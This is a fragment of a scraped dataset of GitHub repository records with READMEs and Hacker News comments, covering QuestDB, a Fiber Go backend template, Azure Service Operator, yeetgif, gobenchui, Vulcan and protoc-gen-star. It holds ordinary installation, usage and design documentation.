source?https://questdb.io/docs/crudOperations \nHas js errors and is not loading/page not foundCongratulations on launching! It looks like a great product. 
Some technical questions which I didn\u2019t see answered on my first glance:(1) Is it a single-server only, or is it possible to store data replicated as well?(2) I\u2019m guessing that all the benchmarks were done with all the hot data paged into memory (correct?); what\u2019s the performance once you hit the disk? How much memory do you recommend running with?(3) How\u2019s the durability? How often do you write to disk? How do you take backups? Do you support streaming backups? How fast/slow/big are snapshot backups?Maybe I'm out of the loop, but I noticed lately that a majority of show/launch hn posts I click on have text that is muted. I know this happens on down voted comments, but is this saying that people are down voting the post itself?Absolutely love the story. TimescaleDB & InfluxDB have had a lot of posts on HN, so I'm sure others are wondering - how do we compare QuestDB to them? It sounds like performance is a big one, but I'm curious to hear your take on it.How do i join the slack group? It says to request invite from the workspace administrator?I find your story very interesting, thank you for sharing that.It also gives an interesting background as to why questdb is different than all the other competitors in the space.kudos @ launching, impressiveGood luck. I work on similar OS database engine for about decade now. It is not bad, but I think consulting is better way to get funds. Also avoid \"zero gc\", JVM can be surprisingly good.Will be in touch :)The SQL explorer at http://try.questdb.io:9000/ is pretty slick \u2013 was that built in-house, or is it based on something that's open-source?Am I the only one that's like \"wtf is a time-series database compared to a normal one?\"Congrats!Also thank you for your awesome blog[0]! It's really the kind of technical gem I enjoy reading late at night :)[0] https://questdb.io/bloggreat story! well done.How do you get the best performance out of QuestDB? Does it have to be on bare metal machines? Is there any performance benchmark of QuestDB running on bare metal vs. cloud instances (e.g. EC2 with EBS volumes) etc.?mmap'd databases are really quick to implement. I implemented both row and column orientated databases. The traders and quants loved it - and adoption took off after we built a web interface that let you see a whole day and also zoom into exact trades with 100ms load times for even the most heavily traded symbols.The benefits of mmaping and in general POSIX filesystem atomic properties are quick implementation, where you don't have to worry about buffer management. The filesystem and disk block remapping layer (in SSD or even HDDs now) are radically more efficient when data are given to them in contiguous large chunks. This is difficult to control with mmap where the OS may write out pages at its whim. However, even using advanced Linux system calls like mremap and fallocate, which try to improve the complexity of changing mappings and layout in the filesystem, eventually this lack of control over buffers will bite you.And then when you look at it, the kernel (with help from the processor TLB) has to maintain complex data-structures to represent the mappings and their dirty/clean states. Accessing memory is not O(1) even when it is in RAM. Making something better tuned to a database than the kernel page management is a significant hurdle but that's where there are opportunities.Does it supports some kind of compression ? That's very important when storing billions of events.Great story! 
Thanks for sharingsomething is off with your website. I just see images \nhttps://questdb.io/blog/2020/07/24/use-questdb-for-swag/Does postgres wire support mean QuestDB can be a drop-in replacement for a postgres database?Is this common?1. Does QuestDB support SQL sufficiently to run, say, the TPC-H analytics benchmark? (not a time series2. If so, can you give some performance figures for a single machine and reasonable scale factors (10 GB, 100 GB, 1000 GB)? Execution times for single queries are even more interesting than the overall random-queries-per-hour figure.3. Can you link to a widely-used benchmark for analytic workloads on time series, which one can use to compare performance of various DBMSes? With SQL-based queries preferably.Hi Vlad, this looks really interesting!I really enjoyed reading the backstory and the founding dynamics upon QuestDB was born and I think a lot of others in the YC community will as well.Can you give some use cases or specific examples of why QuestDB is unique?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "create-go-app/fiber-go-template", "link": "https://github.com/create-go-app/fiber-go-template", "tags": ["template-project", "golang-app-server", "golang", "api-server", "api-test", "create-go-app", "cgapp", "fiber", "backend-template", "docker", "fiber-backend-template", "swagger", "hacktoberfest", "hacktoberfest2021"], "stars": 531, "description": "\ud83d\udcdd Production-ready backend template with Fiber Go Web Framework for Create Go App CLI.", "lang": "Go", "repo_lang": "", "readme": "# Fiber backend template for [Create Go App CLI](https://github.com/create-go-app/cli)\n\n\"go \"go \"license\"\n\n[Fiber](https://gofiber.io/) is an Express.js inspired web framework build on top of Fasthttp, the fastest HTTP engine for Go. Designed to ease things up for **fast** development with **zero memory allocation** and **performance** in mind.\n\n## \u26a1\ufe0f Quick start\n\n1. Create a new project with Fiber:\n\n```bash\ncgapp create\n\n# Choose a backend framework:\n# net/http\n# > fiber\n# chi\n```\n\n2. Rename `.env.example` to `.env` and fill it with your environment values.\n3. Install [Docker](https://www.docker.com/get-started) and the following useful Go tools to your system:\n\n - [golang-migrate/migrate](https://github.com/golang-migrate/migrate#cli-usage) for apply migrations\n - [github.com/swaggo/swag](https://github.com/swaggo/swag) for auto-generating Swagger API docs\n - [github.com/securego/gosec](https://github.com/securego/gosec) for checking Go security issues\n - [github.com/go-critic/go-critic](https://github.com/go-critic/go-critic) for checking Go the best practice issues\n - [github.com/golangci/golangci-lint](https://github.com/golangci/golangci-lint) for checking Go linter issues\n\n4. Run project by this command:\n\n```bash\nmake docker.run\n```\n\n5. 
Go to API Docs page (Swagger): [127.0.0.1:5000/swagger/index.html](http://127.0.0.1:5000/swagger/index.html)\n\n![Screenshot](https://user-images.githubusercontent.com/11155743/112715187-07dab100-8ef0-11eb-97ea-68d34f2178f6.png)\n\n## \ud83d\udce6 Used packages\n\n| Name | Version | Type |\n| --------------------------------------------------------------------- | ---------- | ---------- |\n| [gofiber/fiber](https://github.com/gofiber/fiber) | `v2.41.0` | core |\n| [gofiber/jwt](https://github.com/gofiber/jwt) | `v2.2.7` | middleware |\n| [arsmn/fiber-swagger](https://github.com/arsmn/fiber-swagger) | `v2.31.1` | middleware |\n| [stretchr/testify](https://github.com/stretchr/testify) | `v1.7.1` | tests |\n| [golang-jwt/jwt](https://github.com/golang-jwt/jwt) | `v4.4.1` | auth |\n| [joho/godotenv](https://github.com/joho/godotenv) | `v1.4.0` | config |\n| [jmoiron/sqlx](https://github.com/jmoiron/sqlx) | `v1.3.5` | database |\n| [jackc/pgx](https://github.com/jackc/pgx) | `v4.16.1` | database |\n| [go-sql-driver/mysql](https://github.com/go-sql-driver/mysql) | `v1.6.0` | database |\n| [go-redis/redis](https://github.com/go-redis/redis) | `v8.11.5` | cache |\n| [swaggo/swag](https://github.com/swaggo/swag) | `v1.8.2` | utils |\n| [google/uuid](https://github.com/google/uuid) | `v1.3.0` | utils |\n| [go-playground/validator](https://github.com/go-playground/validator) | `v10.10.0` | utils |\n\n## \ud83d\uddc4 Template structure\n\n### ./app\n\n**Folder with business logic only**. This directory doesn't care about _what database driver you're using_ or _which caching solution your choose_ or any third-party things.\n\n- `./app/controllers` folder for functional controllers (used in routes)\n- `./app/models` folder for describe business models and methods of your project\n- `./app/queries` folder for describe queries for models of your project\n\n### ./docs\n\n**Folder with API Documentation**. This directory contains config files for auto-generated API Docs by Swagger.\n\n### ./pkg\n\n**Folder with project-specific functionality**. This directory contains all the project-specific code tailored only for your business use case, like _configs_, _middleware_, _routes_ or _utils_.\n\n- `./pkg/configs` folder for configuration functions\n- `./pkg/middleware` folder for add middleware (Fiber built-in and yours)\n- `./pkg/repository` folder for describe `const` of your project\n- `./pkg/routes` folder for describe routes of your project\n- `./pkg/utils` folder with utility functions (server starter, error checker, etc)\n\n### ./platform\n\n**Folder with platform-level logic**. 
This directory contains all the platform-level logic that will build up the actual project, like _setting up the database_ or _cache server instance_ and _storing migrations_.\n\n- `./platform/cache` folder with in-memory cache setup functions (by default, Redis)\n- `./platform/database` folder with database setup functions (by default, PostgreSQL)\n- `./platform/migrations` folder with migration files (used with [golang-migrate/migrate](https://github.com/golang-migrate/migrate) tool)\n\n## \u2699\ufe0f Configuration\n\n```ini\n# .env\n\n# Stage status to start server:\n# - \"dev\", for start server without graceful shutdown\n# - \"prod\", for start server with graceful shutdown\nSTAGE_STATUS=\"dev\"\n\n# Server settings:\nSERVER_HOST=\"0.0.0.0\"\nSERVER_PORT=5000\nSERVER_READ_TIMEOUT=60\n\n# JWT settings:\nJWT_SECRET_KEY=\"secret\"\nJWT_SECRET_KEY_EXPIRE_MINUTES_COUNT=15\nJWT_REFRESH_KEY=\"refresh\"\nJWT_REFRESH_KEY_EXPIRE_HOURS_COUNT=720\n\n# Database settings:\nDB_TYPE=\"pgx\" # pgx or mysql\nDB_HOST=\"cgapp-postgres\"\nDB_PORT=5432\nDB_USER=\"postgres\"\nDB_PASSWORD=\"password\"\nDB_NAME=\"postgres\"\nDB_SSL_MODE=\"disable\"\nDB_MAX_CONNECTIONS=100\nDB_MAX_IDLE_CONNECTIONS=10\nDB_MAX_LIFETIME_CONNECTIONS=2\n\n# Redis settings:\nREDIS_HOST=\"cgapp-redis\"\nREDIS_PORT=6379\nREDIS_PASSWORD=\"\"\nREDIS_DB_NUMBER=0\n```\n\n## \u26a0\ufe0f License\n\nApache 2.0 © [Vic Sh\u00f3stak](https://shostak.dev/) & [True web artisans](https://1wa.co/).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Azure/azure-service-operator", "link": "https://github.com/Azure/azure-service-operator", "tags": ["kubernetes", "azure", "kubernetes-operators", "service", "operators"], "stars": 531, "description": "Azure Service Operator allows you to create Azure resources using kubectl", "lang": "Go", "repo_lang": "", "readme": "# Azure Service Operator (for Kubernetes)\n[![Go Report Card](https://goreportcard.com/badge/github.com/Azure/azure-service-operator)](https://goreportcard.com/report/github.com/Azure/azure-service-operator)\n[![Build Status](https://dev.azure.com/azure/azure-service-operator/_apis/build/status/Azure.azure-service-operator?branchName=main)](https://dev.azure.com/azure/azure-service-operator/_build/latest?definitionId=36&branchName=main)\n![v2 Status](https://github.com/azure/azure-service-operator/actions/workflows/live-validation.yml/badge.svg?branch=main)\n\n> Note: The API is expected to change (while adhering to semantic versioning). Alpha, Beta, and Stable mean roughly the same for this project as they do for [all Kubernetes features](https://kubernetes.io/docs/reference/command-line-tools-reference/feature-gates/#feature-stages).\n\n## What is it?\n**Azure Service Operator** (ASO) helps you provision Azure resources and connect your applications to them from within Kubernetes.\n\nIf you want to use Azure resources but would prefer to manage those resources using Kubernetes tooling and primitives (for example `kubectl apply`), then Azure Service Operator might be for you.\n\n## Overview\n\nThe Azure Service Operator consists of:\n\n- The Custom Resource Definitions (CRDs) for each of the Azure services a Kubernetes user can provision.\n- The Kubernetes controller that manages the Azure resources represented by the user specified Custom Resources. 
The controller attempts to synchronize the desired state in the user specified Custom Resource with the actual state of that resource in Azure, creating it if it doesn't exist, updating it if it has been changed, or deleting it.\n\n## Versions of Azure Service Operator\nThere are two major versions of Azure Service Operator: v1 and v2. Consult the below table and descriptions to learn more about which you should use.\n\n> Note: ASO v1 and v2 are two totally independent operators. Each has its own unique set of CRDs and controllers. They can be deployed side by side in the same cluster.\n\n| ASO Version | Lifecycle stage | Development status | Installation options |\n| ----------- |-----------------| --------------------------------- |-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n| v2 | Beta | Under active development. | [Helm chart](/v2/charts), [GitHub release 2.x](https://github.com/Azure/azure-service-operator/releases). See [installation](https://azure.github.io/azure-service-operator/#installation) for example. |\n| v1 | Beta | Bug and security fixes primarily. | [Helm chart](/charts), [OperatorHub](https://operatorhub.io/operator/azure-service-operator) or [GitHub release 1.x](https://github.com/Azure/azure-service-operator/releases) |\n\n### ASO v2\nAzure Service Operator v2 was built based on the lessons learned from ASO v1, with the following improvements:\n\n* Supports code-generated CRDs based on [Azure OpenAPI specifications](https://github.com/Azure/azure-rest-api-specs). This enables us to quickly add new resources as they are requested.\n* More powerful `Status`. You can view the actual state of the resource in Azure through ASO v2, which enables you to see server-side applied defaults and more easily debug issues.\n* Dedicated storage versions. This enables faster (and less error prone) support for new Azure API versions, even if there were significant changes in resource shape.\n* Uniformity. ASO v2 resources are very uniform due to their code-generated nature.\n* Clearer resource states. The state a resource is in is exposed via a [Ready condition](https://azure.github.io/azure-service-operator/design/resource-states/).\n\n[Learn more about Azure Service Operator v2](https://azure.github.io/azure-service-operator/)\n\n### ASO v1\n> **\u26a0\ufe0f We strongly recommend new users consider [ASO v2]((https://azure.github.io/azure-service-operator/)) instead of ASO v1**\n\nAzure Service Operator v1 is no longer under active development. Bug and security fixes are still made.\n\nFeatures may be added if the scope is small and the impact is large, but we are winding down investment into ASO v1. If you are already using ASO v1 a migration path/tool will be provided to eventually move ASO v1 resources to ASO v2. In the meantime you can continue using ASO v1 as you have been.\n\n[Learn more about Azure Service Operator v1](/docs/v1/README.md)\n\n## Contributing\n\nThe [contribution guide](CONTRIBUTING.md) covers everything you need to know about how you can contribute to Azure Service Operators.\n\n## Support and feedback\n\nFor help, please use the following resources:\n\n1. Review the [documentation](https://azure.github.io/azure-service-operator/)\n2. Search [open issues](https://github.com/Azure/azure-service-operator/issues). 
If your issue is not represented there already, please [open a new one](https://github.com/Azure/azure-service-operator/issues/new/choose).\n3. Chat with us on the `azure-service-operator` channel of the [Kubernetes Slack](https://kubernetes.slack.com/). If you are not a member you can get an invitation from the [community inviter](https://communityinviter.com/apps/kubernetes/community).\n\nFor more information, see [SUPPORT.md](SUPPORT.md).\n\n## Code of conduct\n\nThis project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information, see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq) or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sgreben/yeetgif", "link": "https://github.com/sgreben/yeetgif", "tags": ["gif", "effects", "cli", "roll", "wobble", "zoom", "shake", "woke", "fried", "hue", "tint", "optimize", "emoji", "eggplant", "yeet", "golang", "slack", "discord", "maymays", "graphics"], "stars": 531, "description": "gif effects CLI. single binary, no dependencies. linux, osx, windows. #1 workplace productivity booster. #yeetgif #eggplant #golang", "lang": "Go", "repo_lang": "", "readme": "# yeetgif\n\nComposable GIF effects CLI, with reasonable defaults. Made for custom Slack/Discord emoji :)\n\n![terminal](doc/terminal.gif)\n\n- [Get it](#get-it)\n - [Alternative 1: `go get`](#alternative-1-go-get)\n - [Alternative 2: just download the binary](#alternative-2-just-download-the-binary)\n - [Alternative 3: docker](#alternative-3-docker)\n- [Use it](#use-it)\n- [Hall of Fame](#hall-of-fame)\n- [Usage](#usage)\n - [Conventions & tips](#conventions--tips)\n - [roll](#roll)\n - [wobble](#wobble)\n - [pulse](#pulse)\n - [zoom](#zoom)\n - [shake](#shake)\n - [woke](#woke)\n - [fried](#fried)\n - [hue](#hue)\n - [tint](#tint)\n - [resize](#resize)\n - [crop](#crop)\n - [optimize](#optimize)\n - [compose](#compose)\n - [crowd](#crowd)\n - [erase](#erase)\n - [chop](#chop)\n - [text](#text)\n - [emoji](#emoji)\n - [rain](#rain)\n - [cat](#cat)\n - [meta](#meta)\n- [Licensing](#licensing)\n\n## Get it\n\n### Alternative 1: `go get`\n\n```sh\ngo get -u github.com/sgreben/yeetgif/cmd/gif\n```\n\n### Alternative 2: just download the binary\n\nEither from [the releases page](https://github.com/sgreben/yeetgif/releases/latest), or from the shell:\n\n```sh\n# Linux\ncurl -L https://github.com/sgreben/yeetgif/releases/download/${VERSION}/gif_${VERSION}_linux_x86_64.tar.gz | tar xz\n\n# OS X\ncurl -L https://github.com/sgreben/yeetgif/releases/download/${VERSION}/gif_${VERSION}_osx_x86_64.tar.gz | tar xz\n\n# Windows\ncurl -LO https://github.com/sgreben/yeetgif/releases/download/${VERSION}/gif_${VERSION}_windows_x86_64.zip\nunzip gif_${VERSION}_windows_x86_64.zip\n```\n\n**NOTE**: To use the `optimize` command, you'll also need the [`giflossy`](https://github.com/kornelski/giflossy) fork of `gifsicle` installed:\n\n```sh\nbrew install giflossy\n```\n\nYou'll likely also want to have the binary in your `$PATH`. 
You can achieve this by adding this to your .bashrc (or .zshrc, ...):\n\n```sh\nexport PATH=:$PATH\n```\n\n### Alternative 3: docker\n\n```sh\ndocker pull quay.io/sergey_grebenshchikov/yeetgif\ndocker tag quay.io/sergey_grebenshchikov/yeetgif gif # (optional)\n```\n\n## Use it\n\n```sh\ndoc/yeet.gif\n```\n![before](doc/yeet.png)\n![after](doc/yeet.gif)\n\n\n```sh\ngif emoji aubergine | gif wobble >doc/eggplant_wobble.gif\n```\n![before](doc/eggplant.png)\n![after](doc/eggplant_wobble.gif)\n\n## Hall of Fame\n\nPost a GIF made using yeetgif with either the\n\n- [`#yeetgif` Twitter hashtag](https://twitter.com/hashtag/yeetgif?f=tweets)\n- and/or the [`#yeetgif` Giphy hashtag](https://giphy.com/search/yeetgif-stickers)\n- and/or the [`#yeetgif` Imgur hashtag](https://imgur.com/t/yeetgif)\n\n~~Best~~ Most utterly demented ones end up below!\n\n> No entries yet. Be the first :)\n\n## Usage\n\n```text\n${USAGE}\n```\n\n### Conventions & tips\n\n- To find out how a given example was made, try running `gif meta show` on it (e.g. ``.\n\n### roll\n\n![before](doc/eggplant.png)![after](doc/roll.gif)\n\n```text\n${USAGE_roll}\n```\n\n### wobble\n\n![before](doc/eggplant.png)![after](doc/wobble.gif)\n\n```text\n${USAGE_wobble}\n```\n\n### pulse\n\n![before](doc/eggplant.png)![after](doc/pulse.gif)\n\n```text\n${USAGE_pulse}\n```\n\n### zoom\n\n![before](doc/eggplant.png)![after](doc/zoom.gif)\n\n```text\n${USAGE_zoom}\n```\n\n### shake\n\n![before](doc/eggplant.png)![after](doc/shake.gif)\n\n```text\n${USAGE_shake}\n```\n\n### woke\n\n![before](doc/yeet.png)![after](doc/woke.gif)\n\n```text\n${USAGE_woke}\n```\n\n### fried\n\n![before](doc/yeet.png)![after](doc/fried.gif)\n\n```text\n${USAGE_fried}\n```\n\n### hue\n\n![before](doc/eggplant.png)![after](doc/hue.gif)\n\n```text\n${USAGE_hue}\n```\n\n### tint\n\n![before](doc/eggplant.png)![after](doc/tint.gif)\n\n```text\n${USAGE_tint}\n```\n\n### resize\n\n```text\n${USAGE_resize}\n```\n\n### crop\n\n```text\n${USAGE_crop}\n```\n\n### optimize\n\n```text\n${USAGE_optimize}\n```\n\n### compose\n\n![before](doc/yeet.png)![before](doc/eggplant.png)![after](doc/compose.gif)\n\n```text\n${USAGE_compose}\n```\n\n### crowd\n\n![before](doc/wobble.gif)![after](doc/crowd.gif)\n\n```text\n${USAGE_crowd}\n```\n\n### erase\n\n![before](doc/skeledance.gif)![after](doc/erase.gif)\n\n```text\n${USAGE_erase}\n```\n\n### chop\n\n```text\n${USAGE_chop}\n```\n\n### text\n\n![before](doc/gunther.jpg)![after](doc/gunther.gif)\n> woke | text | fried\n\n```text\n${USAGE_text}\n```\n\n### emoji\n\n![example](doc/emoji-terminal.gif)\n> emoji | compose <(emoji) | compose <(emoji) | wobble | fried\n\n```text\n${USAGE_emoji}\n```\n\n### rain\n\n![example](doc/rain.gif)\n\n> emoji | rain\n\n![example](doc/rain-thonk.gif)\n\n> emoji | roll | rain <(emoji) <(emoji)\n\n![example](doc/rain-scream.gif)\n\n> emoji | pulse | rain <(emoji) | compose | fried\n\n```text\n${USAGE_rain}\n```\n\n### cat\n\n```text\n${USAGE_cat}\n```\n\n### meta\n\n\n![input](doc/yeet.gif)\n```sh\n$ \n\n## Features\n\n* nice web based UI with animation, tooltips, icons and realtime status update\n* separate time and memory charts\n* export chart to PNG, JPEG, PDF or SVG formats\n* supports Git and Mercurial version control\n* supports projects that use [gb](http://getgb.io) or GO15VENDOREXPERIMENT vendoring\n* advanced commits filtering\n* supports regexps for benchmarks\n* handles build errors and panics\n\n## Installation\n\nJust go get it:\n\n go get -u github.com/divan/gobenchui\n\n## Usage\n\nTo run 
benchmarks, simply specify the package name:\n\n gobenchui -last 10 github.com/jackpal/bencode-go\n\nor, if you're inside this directory, use `.`:\n\n cd $GOPATH/github.com/jackpal/bencode-go\n gobenchui -last 10 .\n\nA browser will pop up. If not, follow the instructions printed to the console.\n\n## Filtering commits\n\n#### Basic filtering\n\nBy default, gobenchui will run benchmarks over all commits in the repository. You may want to limit the run to the last N commits only. Use the `-last` option:\n\n gobenchui -last 20 .\n\nIf the number of commits is huge, but you want to get an overview of the complete project history, you may use the `-max` option. It tries to divide all commits into N equal blocks, spread them as equally as possible, and guarantee that you'll get an overview for exactly N commits:\n\n gobenchui -max 15 .\n \nYou may also use `-last` and `-max` in conjunction to, say, get an overview of at most 10 commits from the last 100:\n\n gobenchui -max 10 -last 100 .\n\n#### VCS specific filtering\n\nIf you need more powerful commit filtering, you can pass arbitrary arguments to your VCS command with `-vcsArgs`. Say, for `git`, you may specify:\n\n gobenchui -vcsArgs \"--since=12.hours\" .\n\nto get commits from the last 12 hours. Or:\n\n gobenchui -vcsArgs \"--author Ivan --since 2.weeks --grep bench\" .\n \nto get all commits by author 'Ivan' for the last 2 weeks that have the word \"bench\" in the commit message. Or:\n\n gobenchui -vcsArgs \"--no-walk --tag\" .\n \nto get only commits where a tag was added.\n\nIn other words, it's a really powerful way to select only the commits you need. See this [git book chapter](https://git-scm.com/book/en/v2/Git-Basics-Viewing-the-Commit-History) for more details.\n\nNote that gobenchui will filter out args that may modify output (like `--pretty` or `--graph`), because fixed formatting is used for parsing the output.\n\n## Benchmark options\n\nIn the same manner you may pass additional options to the benchmarking tool. Typically you only need to specify a regexp for benchmark functions:\n\n gobenchui -bench Strconv$ .\n \nIt uses the same regexp rules as the `go test` tool. You may also add additional flags like `-short`.\n\n## Vendoring support\n\n`gobenchui` supports gb and GO15VENDOREXPERIMENT out of the box. It can be extended to support more vendoring solutions, as it has a proper interface for that.\n\nIt tries to detect the right tool on each commit, so if you introduced vendoring recently, older benchmarks will also work (just make sure the needed packages are still in your GOPATH before running benchmarks).\n\nI didn't test that part heavily, so there may be some bugs or corner cases I'm not aware of.\n\n## Known issues\n\n * in cases where the latest commits have broken tests, they will not appear in the chart\n * there may be issues with internal/ subpackages\n * chart icons for errors aren't exported correctly\n\n## Contribute\n \nMy frontend JS code sucks, just because, so if you want to design and implement a new, better web UI - you're more than welcome.\n\nMake sure to run `go generate` to regenerate assets. 
Or use GOBENCHUI_DEV env variable to read assets from filesystem.\n\n## Afterwords\n\nHopefully, this tool will bring more incentive to write benchmarks.\n\n## License\n\nThis program is under [WTFPL license](http://www.wtfpl.net)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "digitalocean/vulcan", "link": "https://github.com/digitalocean/vulcan", "tags": ["prometheus", "metrics", "tsdb"], "stars": 531, "description": "Vulcan extends Prometheus adding horizontal scalability and long-term storage", "lang": "Go", "repo_lang": "", "readme": "# Warning: This project is currently not maintained, and there is no plan to do so ATM.\n\n# Vulcan [![Build Status](https://travis-ci.org/digitalocean/vulcan.svg?branch=master)](https://travis-ci.org/digitalocean/vulcan) [![Report Card](https://goreportcard.com/badge/github.com/digitalocean/vulcan)](https://goreportcard.com/report/github.com/digitalocean/vulcan)\n\nVulcan extends Prometheus adding horizontal scalability and long-term storage.\n\n_Vulcan is highly experimental._\n\n## Why\n\nPrometheus has an upper-limit on the number of samples it can handle and manually sharding Prometheus is difficult. Prometheus provides\nno built-in way to rebalance data between nodes once sharded, which makes accommodating additional load via adding nodes a difficult, manual process. Queries\nagainst manually-sharded Prometheus servers must be rethought since each Prometheus instance only has a subset of the total metrics.\n\nIt is difficult to retain data in Prometheus for long-term storage as there is no built-in way to backup and restore Prometheus data. Mirroring\nPrometheus (running multiple identically-configured Prometheus servers) is an option for high availability (and good for the role of monitoring),\nbut newly created mirrors lack historical data and therefore don't provide historical data or any additional replication factor.\n\nVulcan is horizontally scalable and built for long-term storage. In order to accommodate growing load, add more resources to Vulcan. There is no need to think about how to shard\n data and how sharding will affect queries.\n\nPrometheus (as of v1.2.1) is able to forward metrics to Vulcan. Existing Prometheus deployments can easily reconfigure their Prometheus servers to forward all (or just some) metrics\nto Vulcan. Prometheus can continue operating as a simple and reliable monitoring system while utilizing Vulcan for long-term storage.\n\n### Why the name Vulcan?\n\n_Vulcan is the roman god of fire, metalworking and of the forge. Raised in the [digital] ocean, Vulcan was charged with crafting the tools and weaponry._\n\nVulcan aims to enhance the Prometheus ecosystem. Thank you Prometheus for stealing us fire in the first place.\n\n## Architecture\n\nRefer to [architecture.md](architecture.md)\n\n## Contributing\n\nRefer to [CONTRIBUTING.md](CONTRIBUTING.md)\n\n## Contact\n\nThe core developers are accessible via the [Vulcan Developers Mailinglist](https://groups.google.com/forum/#!forum/vulcan-developers)\n\n## Ethos\n\nVulcan components should be stateless; state should be handled by open-source databases (e.g. Cassandra, Kafka).\n\nVulcan should be API-compatible with Prometheus. e.g. 
PromQL discussions and improvements should happen in the\nPrometheus community, committed to Prometheus, and then utilized in Vulcan.\n\n## License\n\nApache License 2.0, see [LICENSE](LICENSE).\n", "readme_type": "markdown", "hn_comments": "I'm guessing the Prometheus they mean is a time-series database. See: https://prometheus.io/Kinda don't get why DigitalOcean \"forked\" rather than solving the long-term retention problem by working with upstream, especially given the number of comments which state \"Development in this area should be done in Prometheus first then merged into Vulcan\".Feels like another \"We want our shed to be blue\".One thing I don't really like about Prometheus is it seems to prefer the pull aka scraping model over the push model.I think the push model is better in terms of security and discovery (which is how I think most of the other metric aggregators work).I don't even like log scrapping. I just push the log data through kafka or rabbitmq and have something else pick it up.I do like how Prometheus has a dimensional model instead of just raw timeseries.Speaking of which I still haven't found an effective way of merging or correlating metric data with log data (particularly since it is two different systems).I sort of made some experimental headway with Druid since it kind of has generic event and metric support. This was only possibly because the events are being pushed and not pulled (ie pushing to a bus allows for syndication).", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lyft/protoc-gen-star", "link": "https://github.com/lyft/protoc-gen-star", "tags": ["lyft"], "stars": 531, "description": "protoc plugin library for efficient proto-based code generation", "lang": "Go", "repo_lang": "", "readme": "# protoc-gen-star (PG*) [![Build Status](https://travis-ci.org/lyft/protoc-gen-star.svg?branch=master)](https://travis-ci.org/lyft/protoc-gen-star) [![GoDoc](https://godoc.org/github.com/lyft/protoc-gen-star?status.svg)](https://godoc.org/github.com/lyft/protoc-gen-star)\n\n**!!! THIS PROJECT IS A WORK-IN-PROGRESS | THE API SHOULD BE CONSIDERED UNSTABLE !!!**\n\n_PG* is a protoc plugin library for efficient proto-based code generation_\n\n```go\npackage main\n\nimport \"github.com/lyft/protoc-gen-star/v2\"\n\nfunc main() {\n pgs.Init(pgs.DebugEnv(\"DEBUG\")).\n RegisterModule(&myPGSModule{}).\n RegisterPostProcessor(&myPostProcessor{}).\n Render()\n}\n```\n\n## Features\n\n### Documentation\n\nWhile this README seeks to describe many of the nuances of `protoc` plugin development and using PG*, the true documentation source is the code itself. The Go language is self-documenting and provides tools for easily reading through it and viewing examples. 
The docs can be viewed on [GoDoc](https://godoc.org/github.com/lyft/protoc-gen-star) or locally by running `make docs`, which will start a `godoc` server and open them in the default browser.\n\n### Roadmap\n\n- [x] Interface-based and fully-linked dependency graph with access to raw descriptors\n- [x] Built-in context-aware debugging capabilities\n- [x] Exhaustive, near 100% unit test coverage\n- [x] End-to-end testable via overrideable IO & Interface based API\n- [x] [`Visitor`][visitor] pattern and helpers for efficiently walking the dependency graph\n- [x] [`BuildContext`][context] to facilitate complex generation\n- [x] Parsed, typed command-line [`Parameters`][params] access\n- [x] Extensible `ModuleBase` for quickly creating `Modules` and facilitating code generation\n- [x] Configurable post-processing (eg, gofmt) of generated files\n- [x] Support processing proto files from multiple packages\n- [x] Load comments (via SourceCodeInfo) from proto files into gathered AST for easy access\n- [x] Language-specific helper subpackages for handling common, nuanced generation tasks\n- [ ] Load plugins/modules at runtime using Go shared libraries\n\n### Examples\n\n[`protoc-gen-example`][pge], can be found in the `testdata` directory. It includes two `Module` implementations using a variety of the features available. It's `protoc` execution is included in the `testdata/generated` [Makefile][make] target. Examples are also accessible via the documentation by running `make docs`.\n\n## How It Works\n\n### The `protoc` Flow\n\nBecause the process is somewhat confusing, this section will cover the entire flow of how proto files are converted to generated code, using a hypothetical PG* plugin: `protoc-gen-myplugin`. A typical execution looks like this:\n\n```sh\nprotoc \\\n -I . \\\n --myplugin_out=\"foo=bar:../generated\" \\\n ./pkg/*.proto\n```\n\n`protoc`, the PB compiler, is configured using a set of flags (documented under `protoc -h`) and handed a set of files as arguments. In this case, the `I` flag can be specified multiple times and is the lookup path it uses for imported dependencies in a proto file. By default, the official descriptor protos are already included.\n\n`myplugin_out` tells `protoc` to use the `protoc-gen-myplugin` protoc-plugin. These plugins are automatically resolved from the system's `PATH` environment variable, or can be explicitly specified with another flag. The official protoc-plugins (eg, `protoc-gen-python`) are already registered with `protoc`. The flag's value is specific to the particular plugin, with the exception of the `:../generated` suffix. This suffix indicates the root directory in which `protoc` will place the generated files from that package (relative to the current working directory). This generated output directory is _not_ propagated to `protoc-gen-myplugin`, however, so it needs to be duplicated in the left-hand side of the flag. PG* supports this via an `output_path` parameter.\n\n`protoc` parses the passed in proto files, ensures they are syntactically correct, and loads any imported dependencies. It converts these files and the dependencies into descriptors (which are themselves PB messages) and creates a `CodeGeneratorRequest` (yet another PB). `protoc` serializes this request and then executes each configured protoc-plugin, sending the payload via `stdin`.\n\n`protoc-gen-myplugin` starts up, receiving the request payload, which it unmarshals. There are two phases to a PG*-based protoc-plugin. 
